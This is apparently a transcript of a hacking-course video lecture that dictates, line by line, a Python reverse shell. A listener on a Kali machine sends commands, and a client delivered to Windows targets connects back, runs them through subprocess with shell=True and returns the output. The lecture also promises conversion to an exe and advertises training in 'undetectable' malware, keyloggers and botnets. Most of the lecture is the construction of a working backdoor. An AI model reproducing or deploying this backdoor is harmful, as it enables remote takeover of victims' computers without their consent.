Hello everybody and welcome back to this lecture, and this is going to be another coding project that we're going to do. And right now, since we are in the system hacking section, we're going to see how we can create the most simple version of a reverse shell in Python programming. Basically, since we are not actual programmers, we only want to see how the actual reverse shell works behind the mask. So we want to actually code it ourselves. We're not going to code anything specific or anything detailed. If you want to see the complete advanced backdoor, keylogger and botnet server that can actually maintain multiple connections, you have an actual course on Udemy that I posted like a month or two ago, which basically explains in great details how you can create a malware that is undetectable, executable on Windows 10 machine, and that can actually execute multiple commands such as download, upload files, create screenshots, execute commands, and so on and so on. But what we're going to do right now, since this is the actual broad course and we only want to see how the reverse shell works, we're going to create the most simple version in Python programming. So right here, what I'm going to do is I have my proxy turned on. I'm going to open up the terminal, and the first thing that we actually want to do is we want to code two programs, and one of them is the actual server, which are we going to run on our Kali Linux machine. So that is going to be the program that is going to listen for the incoming connections, the same way that our exploit multi-handler listens for incoming connections in our Metasploit framework console. And the next program is going to be the reverse shell or the backdoor that we actually deliver to the target. So it is basically the same thing as the meterpreter shell that we deliver to the target, just a little bit simple. Let's first of all start with the server, navigate to my desktop and nano server.py. So that is going to be our server, so basically our listener. And the first thing that you want to do is simply just add this line, since in Python 3 or in Python 2, whatever Python you're using, you need to navigate to the actual Python libraries in order to be able to use them. And you do that simply just by specifying this. So what we are using is we are using the actual nano text editor in order to write our program. Make sure that whatever you call your program, you name it with .py extension, because that is the extension for the Python programs, and then you should be good to go. And right now we can start actually programming. First thing that we need to actually do is we want to import a library that will allow us to actually create the reverse shell connection, and that is the socket library. So the socket library allows us to actually perform the connection between two machines. So in order to actually import it, we'll simply just type import socket. Now for those of you who don't know anything about programming, don't worry. This is going to be a rather small program and I will try to explain as much as I can about it. But feel free to actually search up on the YouTube or internet or take another course perhaps that is going to teach you some kind of programming, because that will be a lot useful later on once you actually start real hacking. So you will not be able to go far just by using different people's tools. So you want to start creating your own tools, whether they are keyloggers, backdoors or exploit development, it doesn't even matter. Just learn programming, because it will make everything else a lot simpler, and you will also understand everything better than before. We imported an actual library that is called the socket library, and now with that socket library we want to create the connection with our target. But before we do that, we need to set up a few different things. So the first thing that we want to set up is the socket object. Now in order to set up the socket object, we need to use the socket library, which has the function called socket. So we can simply just do that with this syntax. So we will call our socket object simply just s, and then s equals socket.socket, and then in between the brackets we will specify socket.af_inet and comma socket.sock_stream. Now what this basically means is that we are creating a socket object that is going to be able to actually communicate over the IPv4 address, and that specifies this right here. So this stands for IPv4 address, while this right here stands for TCP connection. So we want to create a TCP connection over IPv4 address, and that is what we specified right here in our socket object. The next thing that we need to do is set up the socket actual options, and we can do that simply just by using the function set sock_opt, and I will simply just set the socket options. basically the socket library or socket programming is a big topic, so if you're not familiar with it, this might be a little bit weird for you, should I say, but don't worry. As I said, you can simply just search it up and you will see what each of these functions does, even though I'm explaining it right now. But if you want to actually see in more detail how everything works, feel free to Google it once again. Okay, so now that we set up our socket and our socket options, we want to simply just perform the bind function, and this might be actually familiar to you because we are going to bind our IP address or our Kali Linux machine IP address to a port that we want to accept the connections from. So in actual MSF console, we used our IP address with the port 4444 in order to accept connections. So we can use something similar. We can bind our actual IP address of Kali Linux machine, and we can check that out right here. So open in terminal, ifconfig. Our IP address is 192.168.1.7. Yours might be different. And we want to type in the actual first spot, or before we actually do that, type s.bind and then open two brackets and close two brackets. And in between them, you want to specify in double quotes the IP address of your Kali Linux machine. So in my case, 192.168.1.7. And then outside of the actual double quotes, type comma, and then the actual port that you want to connect to. In my case, I will type 4444. So this is the bind function, and the only thing that we're left to do right now is to listen for the incoming connections, and we can use that simply just by specifying listen function from the socket library, and we can listen for the 5 incoming connections, even though we're only going to get the connection back from one target. Right here we can print listening for incoming connections. We can print something like that, doesn't even matter. This will simply just print out this sentence right here, right after these 4 actually finished executing. Then it will print right here and it will listen for the incoming connections. And the next thing we want to specify is basically to accept our target into 2 different variables. So the first variable is going to be our target socket object, and the second variable is going to be the IP address of our target. Basically, so the accept function will simply just accept the connection once it is initiated by the target to our own machine. So once the target opens up our backdoor or our reverse shell or payload, however you want to call it, it will connect back to this port on this IP address, and then this function right here will accept the connection. It will store the socket object from our target into this variable, and it will store the IP address as well as the port from which the connection is coming from to this variable right here. That is why this is called the IP, and this is called the target, because we are going to use this variable in order to communicate with the target, because this is the target's socket object. Therefore, this is important for us to actually remember how we called it. And once we actually accept, we can simply just print. Good, so right now, since the target has connected, there are a few things that we need to do. First of all, we need to enter a loop, or an infinite loop, should I say, that is going to allow us to actually execute commands on the target system as long as we want. So we can do that simply just by typing while true. And what while true basically means is it will actually execute anything inside this while true loop as long as true is equal to true. And or basically as long as 1 is equal to 1. And we know that 1 is equal to 1 forever. Therefore, it will execute this actual loop forever in circles until we actually close the program, or until we add an option for the actual loop to be closed with a specific command or something like that. Okay, so in this while true loop, in order to actually have a code that belongs to the actual loop, you need to tab in once. So tab in, simply just press tab and it will move the actual cursor right here. And right now we want to actually continue with our code. So the next thing that we're expecting is the actual command input from our server. So we want to prompt our actual user of this server to input a command that is going to be sent to the target and executed in its command prompt or in its terminal, however I want to call it. So we will simply just type that command equals raw underscore input. And the raw input commands allows the actual user of this program to input basically any type of string that will then get stored into this command. Or it doesn't even have to be a string, it can be an integer or something like that, but in our case we are simply just searching for the command. So we can type something like this, shell, and then let's add this sign right here, so we are making it look the same as in the terminal. 2 dots, and then right here %string from the IP. And basically what this means is that the string from the IP address will get inputted instead of this %s. So we will have printed out shell and then the IP address, and then we can input the actual command, which will then get stored right here and sent back to the target. Right now what we want to do is we want to perform the actual sending of this command, and we can do that just by using the target socket object, which we stored in this variable. So target.send, and we want to send the actual command. Okay, and then once we actually send the command, we want to actually print the result. So we want to actually wait for a result first of all. So result of the actual command execution will be equal to target.receive, and wanted to wait for maximum of 2048 bytes. And then once we actually get the actual result, we want to print the result to our screen. Print the result, okay, and then we are simply just going to go back to the actual beginning of the loop and execute the command once again. Now the one thing that we actually want to add right here at the end is s.close, first of all, target.close. So these two commands right here will get executed as soon as we break out of this while true loop. Now you might be asking how we are going to break out of this while true loop, because it is infinite and there is not an option for us to break out. Well, we are going to add it right now. And as soon as it breaks out from this loop, it will go to these two commands, which basically close the socket connection with our target, therefore closing our program. Okay, so right here we want to add an option to see how we can actually break out of this while true loop. And we can break out of this while true loop simply just by adding an option to quit from this loop. And we will do that after the target.send command. We'll simply just going to ask if command equals to q. Then we want to simply just use break. So what we use right here is the if statement, which simply just checks if this variable command is equal to q, and it will be equal to q if we simply just inputted q once this actual command prompts up. And then if it is equal to q, it will break out of this actual while true loop and go to this right here, which will then close the connection and close the program. If it is not equal to q, it will wait for the actual result of the command, and it will print the result to the screen and go back to the beginning of the while true loop. I believe this is about it for this program. Let me just save it once again. And now we are good to go, and we should be able to actually start up the reverse shell. Whoops, we want to nano reverse shell.py. Right here we want to add the same beginning line. So right now what we are coding is we're coding the actual program that is going to be our reverse shell or our backdoor. So we want to start once again with the user bin Python, and we want to import once again the socket library. And the first thing that we want to do is we want to create the socket object as in the previous video. So sock, we will call it sock in this case. In the previous one we called it just s, so we can differentiate it. So sock equals, and you basically type the same command because we are creating the same socket object that is going to be run on the target system. So socket.socket, we want the IPv4 address, socket.af_inet, and the TCP connection, so socket.sock_stream. Next thing that we need to do is we need to perform the connection function that is going to be able to actually connect back to the Kali Linux machine. Since this is the actual program that is going to be run on the target, we need to connect back to the actual IP address of our Kali Linux machine. And we can do that simply just by typing sock.connect. Once we created the socket object, we can use the connect function. And in between the connect function, you simply just type 2 open brackets and 2 close brackets, the same way we did in the actual bind function. And right now specify the IP address of your Kali Linux machine as a first argument, so 192.168.1.7, and then comma, and then the actual port number, which is 4444. And then basically we perform the connection to our target machine. Pardon me, to our Kali Linux machine from our target machine. And right now we want to do the same thing that we did in the server and actually enter the while true loop. And what this while true loop is going to do, first of all, it is going to wait for a command to be received from our server. Because if you remember, in our first program or in our server, as soon as we entered the while true loop, we inputted a command and we sent it to our target. So now our target or our reverse shell has to first receive the command, execute it, and then send back the results to the server. So first we are going to see the command, and we are going to actually receive it. So we are going to type sock.receive. We want to receive 2048 bytes. And then what we're going to do is, first of all, we're going to check out whether the command equals to Q. So if command equals to Q, and if the command equals to break, we are going to simply just exit the program the same way we did in our server. So right here, if it is not equal to Q, we are simply just going to execute the command in our command prompt on Windows machine, because this is an actual program that is going to be attacking Windows machines. And in the next video I will show you how you can actually make this Python program an exe file and run it on any Windows target. Right now we're going to type if or if and then else. So in any other case, if the command is not equal to Q, we're going to execute the command. So in order to actually execute the command, we need to actually import another library, which is called the subprocess library, which allows us to actually run this command as a process. So proc equals subprocess.popen. We want to open the command because that is the actual thing that we want to execute. Shell equals true. These are just some of the parameters for this command. Standard output equals subprocess.pipe. So we want to pipe the standard output. Standard error equals subprocess.pipe, and standard input equals subprocess.pipe. So we want to pipe all of that to our proc actual variable, and we want to simply just put everything into our actual result. So result equals, for now on we only created the actual object in this, and now we want to actually type everything into a result that we're going to then send back to server. So result equals proc.stdout.read plus proc.stdr.read, and we're going to put this into our result variable, and then we're going to actually send the result variable to the target, or pardon me, once again to the server. So we are sending back the result. Yeah, that would be about it. We have two programs ready. We have the server and we have the reverse shell. Let me just see, cat server, cat reverse shell. So we have two programs ready. The reverse shell we are going to run on our target system, and the server is going to be ran on our Kali Linux machine and wait for a connection. So what we're going to do is we're going to test these two programs in the next video, as well as actually transfer them into an exe file, or should I say convert them, and see how they work then. Basically that would be about it for this tutorial. I hope you enjoyed it, and I hope I will see you in the next one. Bye.